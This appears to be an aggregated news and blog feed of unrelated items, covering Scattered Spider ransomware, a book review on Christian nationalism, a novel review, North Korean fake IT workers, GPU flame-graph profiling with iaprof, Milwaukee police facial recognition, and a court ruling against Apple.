These attacks are known as ransomware attacks because the assailant then demands a substantial payment, typically in cryptocurrency, to restore access to affected computers. Using another gang’s ransomware is a common practice, known as a ransomware-as-a-service model, where the two entities involved share any proceeds.
Analysts at Recorded Future, a cybersecurity firm, said that Scattered Spider was more of an “umbrella term” than a centralised group of financially motivated cybercriminals – hence the “scattered” moniker. The analysts said it is not a “monolithic entity” and it originated in “The Com”, another loosely connected online community engaged in an array of criminal acts from sextortion to cyberstalking and payment card fraud.
“Members and affiliates of Scattered Spider gathered on platforms like Discord and Telegram, most often in closed, invite-only channels and groups,” Recorded Future analysts said.
Ciaran Martin, the ex-chief executive of the UK’s National Cyber Security Centre, said that Scattered Spider was a “rarity” given its non-Russian background.
“An overwhelming majority of ransomware groups are based in Russia. [Scattered Spider] are clearly not, though they seem to have hired Russian code for this attack in DragonForce. But it seems they’re based here and in the US. Hopefully that makes them arrestable. This is unusual,” said Martin, who is a professor at the Blavatnik school of government at the University of Oxford.
Martin added that Scattered Spider’s youthful notoriety should not detract from the threat. “They are a very unusual but potently threatening bunch,” he said.
Depictions of a White Jesus Uphold Violent Christian Nationalism, White Supremacy
Portside
portside.org
2025-05-01 05:36:24
Depictions of a White Jesus Uphold Violent Christian Nationalism, White Supremacy
Geoffrey
Thu, 05/01/2025 - 00:36
...
Disciples of White Jesus
The Radicalization of American Boyhood
Angela Denker
Broadleaf Books
ISBN: 9798889830757
Journalist and Lutheran pastor Angela Denker, herself the mother of sons, knows that boys can be affectionate, caring and sweet, but she also knows that they can be drawn to hate and violence.
Disciples of White Jesus: The Radicalization of American Boyhood, Denker’s second book, probes the ways Christian nationalism is marketed to boys and exposes the misogyny, racism, homophobia, transphobia and xenophobia that are its stock in trade.
Denker offers a masterful critique of the ways Christianity has helped foment right-wing religious movements, zeroing in on the blonde, blue-eyed Christ that is seen in most U.S. and European churches. She then juxtaposes this image with a more realistic portrait of the “historical, brown-skinned, Middle Eastern, and Jewish Jesus.” The result of this literal whitewashing, she writes, is a “progenitor of the Christian industrial complex that brought us megachurches and celebrity preachers and New York Times bestsellers and the prosperity gospel and Donald Trump.”
Denker finds this appalling and effectively parses how these institutions manipulate language to appeal to young men; her depiction of the way hate is spread by well-dressed preachers, both in person and online, is chilling.
Moreover, her findings reinforce the conclusions of other researchers: Many young white males gravitate to the right because they feel disempowered by feminism, movements for racial equity, and the changing demographics that will make the United States a less white and less Christian nation within the next few decades.
Dylann Storm Roof, the 21-year-old white man who entered Mother Emanuel African Methodist Episcopal Church in Charleston, South Carolina, and prayed with congregants at Bible study before taking out a gun and killing eight Black parishioners and their pastor in 2015, is a case in point. Roof, of course, is neither anomalous nor unique. As Denker reports, white men are responsible for the lion’s share of mass murders against Black people throughout the United States.
“Roof was radicalized online,” Denker writes, “and he was an active reader of and visitor to sites like the Council of Conservative Citizens … Roof mentioned the Council as part of his awakening in an unsigned 2,444-word manifesto on his website, which also included photos of himself taken with a self-timer at slavery-related sites across South Carolina.”
Roof’s evolution is fascinating, and Denker reveals that he not only lacked a “positive rooted identity” but struggled academically and socially. “He found his identity,” she writes, “in hatred of others, and that identity of hatred festered and grew in social circles where people may have mentioned racism or prejudice but didn’t confront it … preferring to avoid uncomfortable topics or introspection.”
This sidestepping allowed Roof to cling to resentment and his presumed entitlement to an elevated place in a white, male-dominated Christian hierarchy. That this idea was supported by the right-wing Christian and white supremacist forums and websites he visited and videos he watched goes without saying. What’s more, Roof saw this messaging as gospel truth and was elated by the sense of belonging he found in a host of online communities.
These communities also fed him a hefty helping of toxic masculinity; Denker notes that Christian nationalist speakers and written materials hammer visible shows of emotion as unmanly, as if vulnerability is a surefire “recipe for disaster, a potential upheaval in a society that has placed white Christian men at the top of a teetering house of cards.”
For teetering men like Roof, it was far easier, and likely more pleasant, to turn his fury toward people he felt were getting more than they deserved than it would have been to probe his disquiet and pain. It’s a sad revelation and one that was repeatedly replayed in sites all over the country, from the Citadel Military College to the far-flung churches and youth ministries that Denker visited. Throughout, she found racism to be a linchpin that was reinforced by pervasive depictions of white Jesus, imagery that she believes leads believers to a reverential distortion. But there is an antidote: “Reminding young, white Christian boys and men that Jesus is not a white man forces them to take Jesus and put him into a seat often occupied by people who are oppressed and marginalized,” she writes, “and whose strength and power are seen more often as a deviant threat than as something to be emulated and admired.”
Despite many strengths, the book falters by not offering more than individualistic responses to the false depiction of the man Christians claim to revere. While one-to-one counseling and making a personal connection to boys who feel cast aside is essential, so too is confronting, opposing and organizing to stop the promotion of white male gender grievance, rivalry and white supremacy.
Denker wants all men and boys to learn to love and be open and respectful to both peers and strangers. It’s a laudable goal, and while there are no ready-made strategies to get us there, it will clearly take all of us to make Christian nationalist messaging unappealing to viewers, listeners and readers.
Focus

This month I didn't have any particular focus. I just worked on issues in my info bubble.

Changes

- swh-web: set GitLab pipeline names
- Debian wiki pages: DebianRepository/Setup, Exploits, Hardware/Wanted

Issues

- Features in glab
- New versions of webext-browserpass

Review

- Patches: notmu...
Beyond Pain is a science fiction dystopian erotic romance novel and a
direct sequel to Beyond Control. Following the romance series
convention, each book features new protagonists who were supporting
characters in the previous book. You could probably start here if you
wanted, but there are significant spoilers here for earlier books in
the series. I read this book as part of the Beyond Series Bundle
(Books 1-3), which is what the sidebar information is for.
Six has had a brutally hard life. She was rescued from an awful situation
in a previous book and is now lurking around the edges of the Sector Four
gang, oddly fascinated (as are we all) with their constant sexuality and
trying to decide if she wants to, and can, be part of their world. Bren is
one of the few people she lets get close: a huge bruiser who likes cage
fights and pain but treats Six with a protective, careful respect that she
finds comforting. This book is the story of Six and Bren getting to the
bottom of each other's psychological hangups while the O'Kanes start
taking over Six's former sector.
Yes, as threatened, I read another entry in the dystopian erotica series
because I keep wondering how these people will fuck their way into a
revolution. This is not happening very quickly, but it seems obvious that
is the direction the series is going.
It's been a while since I've reviewed one of these, so here's another
variation of the massive disclaimer: I think erotica is harder to review
than any other genre because what people like is so intensely personal and
individual. This is not even an attempt at an erotica review. I'm both
wholly unqualified and also less interested in that part of the book,
which should lead you to question my reading choices since that's a good
half of the book.
Rather, I'm reading these somewhat for the plot and mostly for the vibes.
This is not the most competent collection of individuals, and to the
extent that they are, it's mostly because the men (who are, as a rule,
charismatic but rather dim) are willing to listen to the women. What they
are good at is communication, or rather, they're good about banging their
heads (and other parts) against communication barriers until they figure
out a way around them. Part of this is an obsession with consent that goes
quite a bit deeper than the normal simplistic treatment. When you spend
this much time trying to understand what other people want, you have to
spend a lot of time communicating about sex, and in these books that means
spending a lot of time communicating about everything else as well.
They are also obsessively loyal and understand the merits of both
collective action and making space for people to do the things that
they are the best at, while still insisting that people contribute when
they can. On the surface, the O'Kanes are a dictatorship, but they're run
more like a high-functioning collaboration. Dallas leads because Dallas is
good at playing the role of leader (and listening to Lex), which is
refreshingly contrary to how things work in the real world right now.
I want to be clear that not only is this erotica, this is not the sort of
erotica where there's a stand-alone plot that is periodically interrupted
by vaguely-motivated sex scenes that you can skim past. These people use
sex to communicate, and therefore most of the important exchanges in the
book are in the middle of a sex scene. This is going to make this novel,
and this series, very much not to the taste of a lot of people, and I
cannot be emphatic enough about that warning.
But, also, this is such a fascinating inversion. It's common in media for
the surface plot of the story to be full of sexual tension, sometimes to
the extent that the story is just a metaphor for the sex that the
characters want to have. This is the exact opposite of that: The sex is a
metaphor for everything else that's going on in the story. These people
quite literally fuck their way out of their communication problems, and
not in an obvious or cringy way. It's weirdly fascinating?
It's also possible that my reaction to this series is so unusual as to not
be shared by a single other reader.
Anyway, the setup in this story is that Six has major trust issues and
Bren is slowly and carefully trying to win her trust. It's a classic
hurt/comfort setup, and if that had played out in the way that this story
often does, Bren would have taken the role of the gentle hero and Six the
role of the person he rescued. That is not at all where this story goes.
Six doesn't need comfort; Six needs self-confidence and the ability to
demand what she wants, and although the way Beyond Pain gets her there
is a little ham-handed, it mostly worked for me. As with Beyond Shame,
I felt like the moral of the story is that the O'Kane men are just
bright enough to stop doing stupid things at the last possible moment.
I think Beyond Pain worked a bit better than the previous book because
Bren is not quite as dim as Dallas, so the reader doesn't have to
suffer through quite as many stupid decisions.
The erotica continues to mostly (although not entirely) follow traditional
gender roles, with dangerous men and women who like attention. Presumably
most people are reading these books for the sex, which I am wholly
unqualified to review. For whatever it's worth, the physical descriptions
are too mechanical for me, too obsessed with the precise structural
assemblage of parts in novel configurations. I am not recommending (or
disrecommending) these books, for a whole host of reasons. But I think the
authors deserve to be rewarded for understanding that sex can be
communication and that good communication about difficult topics is
inherently interesting in a way that (at least for me) transcends the
erotica.
I bet I'm going to pick up another one of these about a year from now
because I'm still thinking about these people and am still curious about
how they are going to succeed.
Followed by Beyond Temptation, an interstitial novella. The next novel
is Beyond Jealousy.
Rating: 6 out of 10
Reviewed: 2025-04-30
The one interview question that will protect you from North Korean fake workers
RSAC
Concerned a new recruit might be a North Korean stooge out to steal intellectual property and then hit an org with malware? There is an answer, for the moment at least.
According to Adam Meyers, CrowdStrike's senior veep in the counter adversary division, North Korean infiltrators are bagging roles worldwide throughout the year. Thousands are said to have infiltrated the Fortune 500.
They're masking IPs, exporting laptop farms to America so they can connect into those machines and appear to be working from the USA, and they are using AI – but there's a question during job interviews that never fails to catch them out and forces them to drop out of the recruitment process.
“My favorite interview question, because we've interviewed quite a few of these folks, is something to the effect of 'How fat is Kim Jong Un?' They terminate the call instantly, because it's not worth it to say something negative about that," he told a panel session at the RSA Conference in San Francisco Monday.
Meyers explained that the North Koreans use generative AI to develop bulk batches of LinkedIn profiles and applications for remote-work jobs that appeal to Western companies. During an interview, multiple teams work on the technical challenges while the "front man" handles the on-camera side, although sometimes rather ineptly.
"One of the things that we've noted is that you'll have a person in Poland applying with a very complicated name," he recounted, "and then when you get them on Zoom calls it's a military age male Asian who can't pronounce it." But it works enough that quite a few score the job and millions of dollars are being funneled back to North Korea via this route.
Once placed in the coveted role, such workers are usually very successful in the company, since they have multiple people working on one job to produce the best work possible - with the hope of getting a promotion and more access to the business' systems - explained panelist FBI Special Agent Elizabeth Pelker.
"I think more often than not, I get the comment of 'Oh, but Johnny is our best performer. Do we actually need to fire him?'" she said.
The aims of these phony workers are two-fold, she explained. Firstly, they earn a wage and use their access to steal intellectual property from the victim. This is usually exfiltrated in tiny chunks so as to not trigger security systems.
One mitigation strategy, she said, was to insist that any interviewee perform coding tests within the corporate environment. This lets the actual IP address in use be checked, lets interviewers see how often the prospect is switching between screens, and allows other clues to leak out that all is not as it seems.
If the interloper is exposed and fired, however, they will usually have already collected login details, planted unactivated malware, and will then attempt to extort the maximum they can from the victim. She urged anyone who spots a fake employee to contact their local FBI field office immediately.
The Red Queen's race
But the attackers are getting smarter, and in some ways the FBI is a victim of its own success.
The agency has been distributing advice to US companies, but these memos are also being read in Pyongyang and the workers are adapting their tactics. This sometimes involves using both aware and unwitting accomplices.
For example, to get around the IP address problem, laptop farms are springing up all over America. If an applicant gets a job, the firm will usually send him a laptop, at which point the interviewee explains that they've moved or have a family emergency, so could they send it to a new address please?
This is most likely a laptop farm, where someone in the US agrees to run the laptop from a legitimate address for a fee, typically around $200 a computer, according to Meyers. Last year the FBI busted one such operation in Nashville, Tennessee, and charged the operator with conspiracy to cause damage to protected computers, conspiracy to launder monetary instruments, conspiracy to commit wire fraud, intentional damage to protected computers, aggravated identity theft, and conspiracy to cause the unlawful employment of aliens.
Rather than creating identities, the North Korean workers have now taken to either stealing the ones they want, or fooling people into handing them over for a good cause. There's a growing business in Ukraine of convincing people to share their identity with third parties under the pretext of using them against Chinese agents who are propping up Russia.
"Unfortunately, because this is supporting North Koreans, the money then goes back through to filter through to the North Korea regime," said Chris Horne, senior director at the jobs site Upwork. "Then, in turn, it goes to support the troops that come back in through Russia. So they're basically paying for their own demise in Ukraine right now."
We've also seen deepfake job interviewees that are
good enough
to fool IT professionals, sometimes more than once. This technology is only improving and will get more and more convincing, Pelker warned.
The key to fixing this, the panelists agreed, was to educate everyone in the interview process – right down to the lowest staffer – and to be hypervigilant for warning signs. If possible, they said, have someone local swing by for an in-person meeting, and maybe also avoid hiring fully remote employees. ®
AI Flame Graphs are now open source and include Intel Battlemage GPU support, which means it can also generate full-stack GPU flame graphs for providing new insights into gaming performance, especially when coupled with FlameScope (an older open source project of mine). Here's an example of GZDoom, and I'll start with flame scopes for both CPU and GPU utilization, with details annotated:
(Here are the raw CPU and GPU versions.) FlameScope shows a subsecond-offset heatmap of profile samples, where each column is one second (in this example, made up of 50 x 20ms blocks) and the color depth represents the number of samples, revealing variance and perturbation that you can select to generate a flame graph just for that time range.
Putting these CPU and GPU flame scopes side by side has enabled your eyes to do pattern matching to solve what would otherwise be a time-consuming task of performance correlation. The gaps in the GPU flame scope on the right – where the GPU was not doing much work – match the heavier periods of CPU work on the left.
CPU Analysis
FlameScope lets us click on the interesting periods. By selecting one of the CPU shader compilation stripes we get the flame graph just for that range:
This is brilliant, and we can see exactly why the CPUs were busy for about 180 ms (the vertical length of the red stripe): it's doing compilation of GPU shaders and some NIR preprocessing (optimizations to the NIR intermediate representation that Mesa uses internally). If you are new to flame graphs, you look for the widest towers and optimize them first. Here is the interactive SVG.
CPU flame graphs and CPU flame scope aren't new (from 2011 and 2018, both open source). What is new is full-stack GPU flame graphs and GPU flame scope.
GPU Analysis
Interesting details can also be selected in the GPU FlameScope for generating GPU flame graphs.
This example selects the "room 3" range, which is a room in the Doom map that contains hundreds of enemies.
The green frames are the actual instructions running on the GPU, aqua shows the source for these functions, and red (C) and yellow (C++) show the CPU code paths that initiated the GPU programs. The gray "-" frames just help highlight the boundary between CPU and GPU code. (This is similar to what I described in the AI flame graphs post, which included extra frames for kernel code.) The x-axis is proportional to cost, so you look for the widest things and find ways to reduce them.
I've included the
interactive SVG
version of this flame graph so you can mouse-over elements and click to zoom. (
PNG
version.)
The GPU flame graph is split between stalls coming from rendering walls (41.4%), postprocessing effects (35.7%), stenciling (17.2%), and sprites (4.95%). The CPU stacks are further differentiated by the individual shaders that are causing stalls, along with the reasons for those stalls.
GZDoom
We picked GZDoom to try since it's an open source version of a well-known game that runs on Linux (our profiler does not support Windows yet). Intel Battlemage makes light work of GZDoom, however, and since the GPU profile is stall-based we weren't getting many samples. We could have switched to a more modern and GPU-demanding game, but didn't have any great open source ideas, so I figured we'd just make GZDoom more demanding. We built GPU-demanding maps for GZDoom (I can't believe I have found a work-related reason to be using Slade), and also set some Battlemage tunables to limit resources, magnifying the utilization of remaining resources.
Our GZDoom test map has three rooms: room 1 is empty, room 2 is filled with torches, and room 3 is open with a large skybox and filled with enemies, including spawnpoints for Sergeants. This gave us a few different workloads to examine by walking between the rooms.
Using iaprof: Intel's open source accelerator profiler
The AI Flame Graph project is pioneering work, and has needed various changes to graphics compilers, libraries, and kernel drivers, not just the code but also how they are built. Since Intel has its own public cloud (the Intel® Tiber™ AI Cloud) we can fix the software stack in advance so that for customers it "just works." Check the available releases. It currently supports the Intel Max Series GPU.
If you aren't on the Intel cloud, or you wish to try this with Intel Battlemage, then it can require a lot of work to get the system ready to be profiled. Requirements include:
A Linux system with superuser (root) access, so that eBPF and Intel eustalls can be used.
A newer Linux kernel with the latest Intel GPU drivers. For Intel Battlemage this means Linux 6.15+ with the Xe driver; for the Intel Max Series GPU it's Linux 5.15 with the i915 driver.
The Linux kernel built with Intel driver-specific eustall and eudebug interfaces (see the github docs for details). Some of these modifications are upstreamed in the latest versions of Linux and others are currently in progress. (These interfaces are made available by default on the Intel® Tiber™ AI Cloud.)
All system libraries or programs that are being profiled need to include frame pointers so that the full stacks are visible, including Intel's oneAPI and graphics libraries. For this example, GZDoom itself needed to be compiled with frame pointers, as did all libraries used by GZDoom (glibc, etc.). This is getting easier in the latest versions of Fedora and Ubuntu (e.g., Ubuntu 24.04 LTS), which are shipping system libraries with frame pointers by default. But I'd expect there will be applications and dependencies that don't have frame pointers yet and need recompilation (see the sketch after this list). If your flame graph has areas that are very short, one or two frames deep, this is why.
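As a rough illustration of that recompilation step, here is a minimal sketch, assuming a GCC or Clang toolchain and GZDoom's CMake-based build; the compiler flag is the standard one, but the exact paths and cmake options here are illustrative, not the project's official instructions:

# Keep frame pointers so profilers can walk complete stacks
# (-fno-omit-frame-pointer is the standard GCC/Clang flag).
export CFLAGS="-fno-omit-frame-pointer"
export CXXFLAGS="-fno-omit-frame-pointer"
# Illustrative build; RelWithDebInfo keeps optimization plus debug info.
cmake -S gzdoom -B build -DCMAKE_BUILD_TYPE=RelWithDebInfo
cmake --build build -j"$(nproc)"

Dependency libraries need the same treatment, or their frames show up as the short, truncated towers mentioned above.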
If you are new to custom kernel builds and library tinkering, then getting this all working may feel like Nightmare! difficulty. Over time things will improve and gradually get easier: check the github docs. Intel can also develop a much easier version of this tool as part of a broader product offering and get it working on more than just Linux and Battlemage (either watch this space or, if you have an Intel rep, ask them to make it a priority).
Once you have it all working, you can run the iaprof command to profile the GPU. E.g.:
git clone --recursive https://github.com/intel/iaprof
cd iaprof
make deps    # fetch and build the bundled dependencies
make
sudo iaprof record > profile.txt             # root is needed for eBPF and eustall access
cat profile.txt | iaprof flame > flame.svg   # render the recorded profile as a flame graph
iaprof is modeled on the Linux perf command. (Maybe one day it'll become included in perf directly.) Thanks to Gabriel Muñoz for getting the work done to get this open sourced.
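As a point of comparison with perf: here is the classic CPU flame graph pipeline, a sketch assuming the stackcollapse and flamegraph scripts from the FlameGraph project (github.com/brendangregg/FlameGraph) are cloned into the current directory. Note the same record-then-render split that iaprof uses:

git clone https://github.com/brendangregg/FlameGraph
sudo perf record -F 99 -a -g -- sleep 30    # sample all CPUs at 99 Hertz for 30 seconds
sudo perf script | FlameGraph/stackcollapse-perf.pl | FlameGraph/flamegraph.pl > cpu.svg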
FAQ and Future Work
From the launch of AI flame graphs last year, I can guess what FAQ #1 will be: “What about NVIDIA?”. They do have flame graphs in Nsight Graphics for GPU workloads, although their flame graphs are currently shallow as it is GPU code only, and onerous to use as I believe it requires an interposer; on the plus side they have click-to-source. The new GPU profiling method we've been developing allows for easy, everything, anytime profiling, like you expect from CPU profilers.
Future work will include github releases, more hardware support, and overhead reduction. We're the first to use eustalls in this way, and we need to add more optimization to reach our target of <5% overhead, especially with the i915 driver.
Conclusion
We've open sourced
AI flame graphs
and tested it on new hardware, Intel Battlemage, and a non-AI workload: GZDoom (gaming). It's great to see a view of both CPU and GPU resources down to millisecond resolution, where we can see visual patterns in the flame scope heat maps that can be selected to produce flame graphs to show the code. We applied these new tools to GZDoom and explained GPU pauses by selecting the corresponding CPU burst and reading the flame graph, as well as GPU code use for arbitrary time windows.
While we have open sourced this, getting it all running requires Intel hardware and Linux kernel and library tinkering – which can be a lot of work. (Actually playing Doom on Nightmare! difficulty may be easier.) This will get better over time. We look forward to seeing if anyone can fight their way through this work in the meantime and what new performance issues they can solve.
Authors: Brendan Gregg, Ben Olson, Brandon Kammerdiener, Gabriel Muñoz.
Milwaukee police trade: 2.5M mugshots for free facial recognition access
Milwaukee Police Department is proposing trading 2.5 million jail records for facial recognition technology access with the company Biometrica.
Police say acquiring the technology will lead to a higher case clearance rate and improve the speed at which crimes are solved. Officials say it will not be used on its own to establish probable cause.
Activists and residents have concerns over the impact on privacy and the growing amount of surveillance tech in the city. Some are also concerned about how federal agencies could access it.
Milwaukee police are mulling a trade: 2.5 million mugshots for free use of facial recognition technology.
Officials from the Milwaukee Police Department say swapping the photos with the software firm Biometrica will lead to quicker arrests and solving of crimes. But that benefit is unpersuasive to those who call the trade startling, citing concerns over the surveillance of city residents and possible federal agency access.
"We recognize the very delicate balance between advancement in technology and ensuring we as a department do not violate the rights of all of those in this diverse community," Milwaukee Police Chief of Staff Heather Hough said during an April 17 meeting.
For the first time, Milwaukee police officials detailed their plans to use the facial recognition technology during a meeting of the city's Fire and Police Commission, the oversight body for those departments. In the past, the department relied on facial recognition technology belonging to neighboring police agencies.
In an April 24 email, Hough said the department has not entered into an agreement with any facial recognition vendor and intends to continue engaging the public before doing so. The department will next discuss it at a future meeting of the city's Public Safety and Health Committee, she said.
"While we would like to acquire the technology to assist in solving cases, being transparent with the community that we serve far outweighs the urgency to acquire," she said in an email.
Officials said the technology alone could not be used as probable cause to arrest someone, and the only authorized uses would be when there's a basis to believe criminal activity has happened or could happen, or a threat to public safety is imminent.
Hough said the department intended to craft a policy that would ensure no one is arrested solely based on facial recognition matches.
That reassurance and others from police officials came as activists, residents and some public officials voiced concern.
Concerns ranged from studies which show bias in the technology; its potential use by federal agencies like Immigration and Customs Enforcement; and infringement on civil liberties. Many speakers noted cities, including Madison, have banned facial recognition's use by city agencies.
Aurelia Ceja said the discrepancy in the information police release on themselves — noting that officers involved in shootings don't have their names released — compared to the amount of information the police have on residents is a concern.
At the meeting, officials shared how the technology had been used in recent cases — a homicide and a sexual assault — to assist in identifying suspects. In both cases, police ran photos of men ultimately charged in the crimes through facial recognition technology to help identify them. Those identifications were then confirmed during the investigation, police said.
The company the department is exploring working with is Biometrica, which began by working in the gambling industry in the late '90s.
The police presentation said it does not retain data, such as photos of possible suspects, which the police put into its system to check for matches. In exchange for the initial 2.5 million jail records, the company is offering two free search licenses, with any additional licenses costing $12,000 each.
Biometrica did not respond to a request for comment.
Fire and Police Commissioner Krissie Fung, who was recently appointed to the oversight body, said in an interview she was unconvinced by the proposal to use the technology at this time. Use of facial recognition should be determined by residents, she said.
Fung, like other speakers at the meeting, was concerned about adopting the technology in the current political environment under President Donald Trump. She cited the IRS agreeing to share data with Immigration and Customs Enforcement as an example.
"I did not get the sense that there are clear protections against federal entities being able to access this facial recognition data either through MPD or the company they will use," she said.
A spokesperson for Mayor Cavalier Johnson declined comment on his support for the police acquiring the technology.
A commissioner cites own experience with bias in facial recognition
During the April 17 meeting, Fire and Police commissioner Ramon Evans said he had been subject to bias by facial recognition while at Potawatomi Casino.
"I got called over and I wasn't the guy," he said. "I was a victim of error."
That anecdote followed nearly 90 minutes of public comment from attendees, many of whom cited concerns over bias in the technology. For years, the technology's issues with identifying the faces of Black and Brown people, and other minorities, have been well publicized.
Police officials also said Biometrica offers training on racial bias in the technology.
Last year, a U.S. Commission on Civil Rights report found the technology has been rapidly adopted by federal agencies with little oversight and raised particular risks for people of color and women. The report also found the U.S. Justice Department had awarded $4.2 million to local police for programs used, in part, for facial recognition.
The technology's capabilities and shortcomings are changing quickly, as evidenced by research from
Thaddeus Johnson
, an assistant professor at the Andrew Young School of Public Studies at Georgia State University. A former police captain in Memphis, he
studies facial recognition
and
published a study
in 2022 noting it contributed to greater racial disparities in arrests.
But, as he continued his research, the findings became more complicated.
In a 2024 study, Johnson found departments which use facial recognition technology saw lower rates of felony violence and homicides without contributing to disparities or over-arrests. In a review of the 2022 work that followed, Johnson found it led to higher disparities when used specifically on property crimes.
Now, he believes it makes sense for departments to use it for crimes like homicides, but not for things like theft and robbery.
Both of his studies focused on the outcomes of departments that used facial recognition. They did not examine how the tool was being used, such as whether it focused on a specific neighborhood or crime type.
Johnson said facial recognition technology has improved greatly since his studies began; however, it still has large gaps between its effectiveness in perfect environments — portrait-like photos taken and analyzed — compared to those taken in everyday environments.
He believes police misuse of facial recognition is more to blame for these issues than the technology itself.
"It's not a magic bullet. It can if not used carefully, exacerbate these disparities," he said.
Facial recognition technology would only be the latest police technology in Milwaukee
The facial recognition proposal prompted backlash before it was even formally made, with concerns over the growth of past police technology cited as a factor.
In a statement, the American Civil Liberties Union of Wisconsin asked the Milwaukee Common Council to adopt a two-year pause on any new surveillance technology and to develop and pass policy regulating existing technology. It also asked the council to incorporate community input through a public body called Community Control Over Police Surveillance, or CCOPS for short.
It's the second technology the Milwaukee Police Department has announced plans for in the last month. The department announced plans to create a drone team in March, drawing scrutiny over whether drone footage could be incorporated into facial recognition. The department's recently adopted policy prohibits it.
In recent years, the department also announced programs where residents can share surveillance footage with the police. The police also use a technology known as FLOCK cameras, which read license plate numbers and have spread across the greater Milwaukee area.
"We are already seeing how surveillance technology is being weaponized in real time," the ACLU's statement said. "While we trust that our local leaders and police officers may have good intentions, history reminds us how quickly larger systems can override those intentions."
David Clarey is a public safety reporter at the Milwaukee Journal Sentinel. He can be reached at dclarey@gannett.com.
★ Judge Yvonne Gonzalez Rogers Rules, in Excoriating Decision, That Apple Violated Her 2021 Court Order Regarding App Store Anti-Steering Provisions
Daring Fireball
daringfireball.net
2025-05-01 03:46:59
Are the results of this disastrous for Apple’s App Store business? I don’t think so at all. Gonzalez Rogers is demanding that Apple ... do what Phil Schiller recommended they do all along. But are the results of this disastrous for Apple’s reputation and credibility? It sure seems like it....
To summarize:
One, after trial, the Court found that Apple’s 30 percent commission “allowed it to reap supracompetitive operating margins” and was not tied to the value of its intellectual property, and thus, was anticompetitive. Apple’s response: charge a 27 percent commission (again tied to nothing) on off-app purchases, where it had previously charged nothing, and extend the commission for a period of seven days after the consumer linked-out of the app. Apple’s goal: maintain its anticompetitive revenue stream.
Two, the Court had prohibited Apple from denying developers the ability to communicate with, and direct consumers to, other purchasing mechanisms. Apple’s response: impose new barriers and new requirements to increase friction and increase breakage rates with full page “scare” screens, static URLs, and generic statements. Apple’s goal: to dissuade customer usage of alternative purchase opportunities and maintain its anticompetitive revenue stream. In the end, Apple sought to maintain a revenue stream worth billions in direct defiance of this Court’s Injunction.
There’s quite a bit of fury in those italics. Rule one when you’re in court, any court, is “Don’t piss off the judge.” Apple has absolutely infuriated Gonzalez Rogers through actions that all of us saw as outrageous.
In stark contrast to Apple’s initial in-court testimony,
contemporaneous business documents reveal that Apple knew exactly
what it was doing and at every turn chose the most anticompetitive option. To hide the truth, Vice-President of
Finance, Alex Roman, outright lied under oath. Internally, Phillip
Schiller had advocated that Apple comply with the Injunction, but
Tim Cook ignored Schiller and instead allowed Chief Financial
Officer Luca Maestri and his finance team to convince him
otherwise. Cook chose poorly. The real evidence, detailed herein,
more than meets the clear and convincing standard to find a
violation. The Court refers the matter to the United States
Attorney for the Northern District of California to investigate
whether criminal contempt proceedings are appropriate.
This is an injunction, not a negotiation. There are no do-overs
once a party willfully disregards a court order. Time is of the
essence. The Court will not tolerate further delays. As previously
ordered, Apple will not impede competition. The Court enjoins
Apple from implementing its new anticompetitive acts to avoid
compliance with the Injunction.
Effective immediately Apple will no longer impede developers’ ability to communicate with users nor will they levy or impose a new commission on off-app purchases.
You know a judge is pissed when she busts out the bold italics. Later, on page 21 (citations omitted for readability):
Prior to the June 20 meeting, there were individuals within Apple
who were advocating for a commission, and others advocating for no
commission. Those advocating for a commission included Mr. Maestri
and Mr. Roman. Mr. Schiller disagreed. In an email, Mr. Schiller
relayed that, with respect to the proposal for “a 27% commission
for 24 hours,” “I have already explained my many issues with the
commission concept,” and that “clearly I am not on team
commission/fee.” Mr. Schiller testified that, at the time, he “had
a question of whether we would be able to charge a commission”
under the Injunction, a concern which he communicated.
Schiller comes across as Apple’s sole voice of reason, fairness, and dare I say honesty in this entire ruling. The only people in the world who seemed to think Apple could or should comply with the 2021 injunction (that apps be permitted to steer users to the web to make purchases) by charging a commission — any commission, let alone a 27 percent commission — on those web transactions were Apple’s finance team members, led by Luca Maestri and Alex Roman, and Tim Cook.
Unlike Mr. Maestri and Mr. Roman, Mr. Schiller sat through the
entire underlying trial and actually read the entire 180-page
decision. That Messrs. Maestri and Roman did neither, does not
shield Apple of its knowledge (actual and constructive) of the
Court’s findings.
I mean Jesus H. Christ, that’s scathing.
It’s worth pointing out that Luca Maestri is no longer Apple’s CFO. (Kevan Parekh is.) Back in August, Apple announced that Maestri was, effectively, retiring as CFO “as part of a planned succession”. Apple’s statement didn’t use the word retiring, but rather the word transitioning. With this ruling and Maestri’s central role in Apple’s decision to forge ahead with a compliance plan where they “allowed” steering to the web by charging the same effective commissions on web transactions as they do for in-app transactions, I now have to wonder whether Maestri retired or “retired”. “Cook chose poorly” (by following Maestri’s recommendation) is not the sort of sentence from a judge that keeps CFOs in their jobs.
As for Alex Roman, I think he’s in some serious trouble. Like doing-time-in-the-clink trouble:
Despite its own considerable evaluation, during the first May 2024
hearing, Apple employees attempted to mislead the Court by
testifying that the decision to impose a commission was grounded
in AG’s report. The testimony of Mr. Roman, Vice President of
Finance, was replete with misdirection and outright lies. He even
went so far as to testify that Apple did not look at comparables
to estimate the costs of alternative payment solutions that
developers would need to procure to facilitate linked-out
purchases.
The Court finds that Apple did consider the external costs developers faced when utilizing alternative payment solutions for linked out transactions, which conveniently exceeded the 3% discount Apple ultimately decided to provide by a safe margin. Apple did not rely on a substantiated bottoms-up analysis during its months-long assessment of whether to impose a commission, seemingly justifying its decision after the fact with the AG’s report.
Mr. Roman did not stop there, however. He also testified that up
until January 16, 2024, Apple had no idea what fee it would impose
on linked-out purchases:
Q. And I take it that Apple decided to impose a 27 percent fee
on linked purchases prior to January 16, 2024, correct?
A. The decision was made that day.
Q. It’s your testimony that up until January 16, 2024, Apple had
no idea what — what fee it’s going to impose on linked purchases?
A. That is correct.
Another lie under oath: contemporaneous business documents reveal
that on the contrary, the main components of Apple’s plan,
including the 27% commission, were determined in July 2023.
Neither Apple, nor its counsel, corrected the, now obvious, lies. They did not seek to withdraw the testimony or to have it stricken (although Apple did request that the Court strike other testimony). Thus, Apple will be held to have adopted the lies and misrepresentations to this Court.
There’s so much more. The whole ruling is compelling — and damning — reading.
Keep in mind this whole thing stems from an injunction from a lawsuit filed by Epic Games that Apple largely won. The result of that lawsuit was basically, “OK, Apple wins, Epic loses, but this whole thing where apps in the App Store aren’t allowed to inform users of offers available outside the App Store, or send them to such offers on the web (outside the app) via easily tappable links, is bullshit and needs to stop. If the App Store is not anticompetitive it should be able to compete with links to the web and offers from outside the App Store.”
